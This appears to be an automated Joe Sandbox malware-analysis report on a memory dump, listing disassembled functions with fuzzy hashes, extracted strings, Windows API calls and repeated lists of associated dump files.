Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ,j^e$="u$G]~,$uv<$]X
API String ID: 0-1891609001
Opcode ID: de8bd440d7d68c29243d9eb0c60da930434a040fa41c998ea0ea95dbd9beb8a7
Instruction ID: 27712c5cdd695778b4c8ef0f45a934ef55dbe319e3617c749238057c5eba385c
Opcode Fuzzy Hash: de8bd440d7d68c29243d9eb0c60da930434a040fa41c998ea0ea95dbd9beb8a7
Instruction Fuzzy Hash: C58226F3A0C204AFE304AE2DDC8577ABBE5EF94720F1A453DEAC4C7744EA3558058696

Function 00C62E9D Relevance: 7.3, Strings: 5, Instructions: 1047COMMON

Download Yara Rule

Strings

@_, xrefs: 00C6395F
oPOz, xrefs: 00C6356E
%K.s, xrefs: 00C63489
0O/, xrefs: 00C63453
ja+7, xrefs: 00C639A3

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %K.s$0O/$@_$ja+7$oPOz
API String ID: 0-3747271267
Opcode ID: aa798dd91e999493ba6f478aafaad335248a2ebaf4d4cbbee5211a740b6ffda3
Instruction ID: 1d10d40a7f8725b2974048b8e740275e66d3e01e17f915434bced946a9d53e76
Opcode Fuzzy Hash: aa798dd91e999493ba6f478aafaad335248a2ebaf4d4cbbee5211a740b6ffda3
Instruction Fuzzy Hash: 97624BF3A0C2049FE3046E2DEC8577BB7D9EBD4220F26863EE6C4C7744E93598058696

Function 00C65B83 Relevance: 6.5, Strings: 4, Instructions: 1526COMMON

Download Yara Rule

Strings

TZ], xrefs: 00C66BFF
PK@, xrefs: 00C66946
Fn~, xrefs: 00C6605B
]rH,, xrefs: 00C65D36

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Fn~$PK@$]rH,$TZ]
API String ID: 0-3941788597
Opcode ID: f9a01c38ed8ff78866f335034e33a3949cf3e252bc5a665d1070a2f07422fd25
Instruction ID: 4b7d66de64ab739625aa4dab97cb682d36d3585432016e5534ff346a7cd28ab5
Opcode Fuzzy Hash: f9a01c38ed8ff78866f335034e33a3949cf3e252bc5a665d1070a2f07422fd25
Instruction Fuzzy Hash: FAA2E2F360C2049FE3046E2DEC8567AFBE9EF94720F1A492DEAC583744EA7558018797

Function 008A8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00895184,40000001,00000000,00000000,?,00895184), ref: 008A8EC0

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 2a757c3e507b060174263b2aa76c567da4e7184c5754e83312d61759ad03fd10
Instruction ID: 21e199c59b48a9c6383a2f522b7d7fc194b6a2641d57055a53d8070111d74c1f
Opcode Fuzzy Hash: 2a757c3e507b060174263b2aa76c567da4e7184c5754e83312d61759ad03fd10
Instruction Fuzzy Hash: F611F570200209EFEB00CFA4E884FAA37A9FF8A704F109448F919CB650DB75E851DB60

Function 00899AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00894EEE,00000000,?), ref: 00899B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899B2A
LocalFree.KERNEL32(?,?,?,?,00894EEE,00000000,?), ref: 00899B3F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: e79719a14802fbaf05b0e6718ec4ab3cc93b4baa16803fdea4944c65aedd0235
Instruction ID: 53f3d3fce5bfd8591704f0e04e7bc0e5dc9d097349d2b30173017d9943953a5e
Opcode Fuzzy Hash: e79719a14802fbaf05b0e6718ec4ab3cc93b4baa16803fdea4944c65aedd0235
Instruction Fuzzy Hash: 8311A2B4241208AFEB10CFA4DC95FAA77B5FB89710F208059FD159B390C7B6A901DB90

Function 008A7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E00,00000000,?), ref: 008A79B0
RtlAllocateHeap.NTDLL(00000000), ref: 008A79B7
GetLocalTime.KERNEL32(?,?,?,?,?,008B0E00,00000000,?), ref: 008A79C4
wsprintfA.USER32 ref: 008A79F3

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: fe08c30ea8d43a89a073651e3e206f5df9f2aea731d5f0da41a5923589ec0605
Instruction ID: 9b488e79f49204a8c920bdbc632dc73264a91c41307a74a3f0f3ff5a64858c8c
Opcode Fuzzy Hash: fe08c30ea8d43a89a073651e3e206f5df9f2aea731d5f0da41a5923589ec0605
Instruction Fuzzy Hash: 8B1127B2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA06A2280E3395941DBB1

Function 00C5A0B9 Relevance: 5.4, Strings: 3, Instructions: 1612COMMON

Download Yara Rule

Strings

p _=, xrefs: 00C5A1DE
QX$g, xrefs: 00C5AEE1
H(g, xrefs: 00C5A656

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: H(g$QX$g$p _=
API String ID: 0-894082251
Opcode ID: b959cc5efba04e54952666811afc1e1afd6fed42c6359f32f782a62cec3efe79
Instruction ID: 1aca11a7f4a213f54b1350ca8067468f8d686e3ea3c92b0a6192c8ab7cbb8b8e
Opcode Fuzzy Hash: b959cc5efba04e54952666811afc1e1afd6fed42c6359f32f782a62cec3efe79
Instruction Fuzzy Hash: 3AB206F3A0C6049FE304AE2DEC8577ABBE9EF94320F1A453DE6C583744EA3558058697

Function 00C610AD Relevance: 5.0, Strings: 3, Instructions: 1228COMMON

Download Yara Rule

Strings

V]:, xrefs: 00C61D0D
8__{, xrefs: 00C616E3
$6FH, xrefs: 00C61768

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: $6FH$8__{$V]:
API String ID: 0-140643384
Opcode ID: e884d543f94799e8ba1c2315b3e4b04f541652d0294e98583446735ff21ddbc8
Instruction ID: 52e8486ec06c508dfe31c0a9c94affde707f8013f64d6386bb6ccde155fe6e5f
Opcode Fuzzy Hash: e884d543f94799e8ba1c2315b3e4b04f541652d0294e98583446735ff21ddbc8
Instruction Fuzzy Hash: 3D822BF3A082049FE704AE2DEC8566AF7E9EF94720F1A453DEAC4C3744E97598058693

Function 008A3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(008AE118,00000000,00000001,008AE108,00000000), ref: 008A3758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 008A37B0

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
